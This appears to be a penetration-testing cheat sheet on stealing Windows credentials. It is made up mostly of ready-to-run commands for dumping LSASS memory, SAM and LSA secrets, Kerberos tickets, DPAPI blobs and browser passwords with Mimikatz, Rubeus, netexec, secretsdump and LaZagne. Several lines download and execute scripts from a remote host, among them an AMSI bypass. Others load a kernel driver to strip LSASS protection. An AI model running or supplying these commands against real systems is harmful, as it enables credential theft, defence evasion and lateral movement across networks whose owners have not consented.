Credential Theft
LSASS Dump
- Mimikatz Basics
mimikatz.exe
privilege::debug
To load mimikatz directly:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/EmpireProject/Empire/7a39a55f127b1aeb951b3d9d80c6dc64500cacb5/data/module_source/credentials/Invoke-Mimikatz.ps1')
One-liners:
invoke-mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords"'
invoke-mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam"'
- NTLM Hashes ( This command requires elevated privileges)
This module is very famous for being able to "dump plaintext passwords from memory", however, Microsoft have implemented a lot of mitigations in Windows 10 and above, such as disabling wdigest by default.
This module is still capable of retrieving NTLM hashes which is useful for pairing with the Pass the Hash or even cracking to recover the plaintext.
sekurlsa::logonpasswords
- Remote LSASS Dump
nxc smb 10.15.67.1 -u administrador -H 'e067b5abd85fa0e8f1d9c6e9611ae120' --local-auth -M lsassy
nxc smb 10.15.67.1 -u administrador -H 'e067b5abd85fa0e8f1d9c6e9611ae120' --local-auth -M nanodump
pypykatz lsa minidump X.log
- Offline LSASS Dump
First we run custom minidump tool (https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/MiniDump). We can use the compiled executable or the ps1 script.
With the dump file created, we can run Mimikatz to parse it:
c:\Tools\Mimikatz\mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
To transfer to our attacking windows machine and directly read the LSASS through the powershell version of mimikatz, we host on the kali machine the dumped lsass and the mimikatz powershell script and then:
wget -Uri http://192.168.119.120/lsass.dmp -OutFile C:\tools\lsass.dmp
(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/mimikatz.txt') | IEX
Invoke-Mimikatz -Command "`"sekurlsa::minidump c:\tools\lsass.dmp`"sekurlsa::logonpasswords"
- Diasble LSASS Protection
First, to check the RunAsPPL registry key to determine if LSA protection is enabled:
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
!+ --> load the mimidrv.sys driver
!+ --> load the mimidrv.sys driver!processprotect /process:lsass.exe /remove --> disable the LSA Protection. It does require that we upload the mimidrv.sys driver to the victim machine, which may trigger antivirus.
We can also download an updated version of the Mimikatz mimidrv.sys and load it manually:
sc create mimidrv binPath= C:\inetpub\wwwroot\upload\mimidrv.sys type= kernel start= demand
sc start mimidrv
Then we can import the powershell version of mimikatz:
(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/amsi.txt') | IEX
(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/mimikatz.txt') | IEX
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
Once the protection is gone we can dump it locally.
Kerberos Tickets Extraction
One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily. Rubeus is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.
Its triage command will list all the Kerberos tickets in your current logon session and if elevated, from all logon sessions on the machine:
Rubeus.exe triage
Rubeus' dump command will extract these tickets from memory - but because it uses WinAPIs, it does not need to open suspicious handles to LSASS. Example:
Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap
We can add /nowrap option which will format the base64 encoding onto a single line - this makes copy & pasting much easier.
Kerberos Encryption Keys Dump
! This command requires high privileges
sekurlsa::ekeys
LSA Secrets Dump
LSA Secrets are stored in the SECURITY registry hive and contain sensitive and encrypted information used by the Local Security Authority (LSA). The LSA is a protected subsystem that authenticates and logs users onto the local system.
With mimikatz:
token::elevate
lsadump::secrets
Manually:
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
Then to obtain the hashes:
secretsdump.py -security '/path/to/security.save' LOCAL
With netexec (Can be also done with PtH and PtT):
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth --lsa
To remotely dump (This will dump LSA secrets and SAM):
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
Security Account Manager (This command requires elevated privileges) Dump
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only
Usually %SYSTEMROOT% = C:\Windows%SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system
If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.
With mimikatz:
mimikatz lsadump::sam
With msf:
meterpreter > run hashdump
Manually:
reg save HKLM\SAM "C:\Windows\Temp\sam.save"
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
Then to obtain the hashes:
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
With Netexec (Can be also done with PtH and PtT):
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth --sam
To remotely dump (This will dump LSA secrets and SAM):
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
To generate a hash file for John or hashcat:
pwdump SYSTEM SAM >/root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
python3 creddump7/pwdump.py SYSTEM SAM
Then it could be cracked using hashcat mode 1000.
Domain Cached Credentials Dump
Domain Cached Credentials (DCC) was designed for instances where domain credentials are required to logon to a machine, even whilst it's disconnected from the domain (think of a roaming laptop for example). The local device caches the domain credentials so authentication can happen locally, but these can be extracted and cracked offline to recover plaintext credentials.
Unfortunately, the hash format is not NTLM so it can't be used with pass the hash. The only viable use for these is to crack them offline.
! This command requires high privileges
The lsadump::cache Mimikatz module can extract these from HKLM\SECURITY.
DPAPI (Credential Manager) Dump
First we need to enumerate user's vaults (Exploitation/Active Directory/Host and Domain Recon/Other Tools/Seatbelt)
First we need to decrypt the master key, 2 ways:
The first is only possible if you have local admin access on the machine and if the key is cached in LSASS.
mimikatz sekurlsa::dpapi
The second way (which does not require elevation or interaction with LSASS), is to request it from the domain controller via the Microsoft BackupKey Remote Protocol (MS-BKRP), This will only work if executed in the context of the user who owns the key.
mimikatz dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\{SID: S-X-X-XX-}\{masterkeyGUID} /rpc
Then, the blob can be decrypted:
mimikatz dpapi::cred /in:C:\Users\User\AppData\Local\Microsoft\Credentials\{BLOB} /masterkey:{key_obtained}
DPAPI (Scheduled Task Credentials) Dump
Scheduled Tasks can save credentials so that they can run under the context of a user without them having to be logged on. If we have local admin privileges on a machine, we can decrypt them in much the same way. The blobs are saved under C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials.
ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\{BLOB}
mimikatz sekurlsa::dpapi
mimikatz dpapi::cred /in:C:\Users\User\AppData\Local\Microsoft\Credentials\{BLOB} /masterkey:{key_obtained}
Then we can impersonate the user (make token).
To automate the process: https://github.com/login-securite/DonPAPI
Browser Credentials Dump
- SharpWeb
https://github.com/djhohnstein/SharpWeb
SharpWeb.exe
- Netexec
nxc smb {IP} -M firefox
- Lazgne
https://github.com/AlessandroZ/LaZagne
lazagne.exe all
Last updated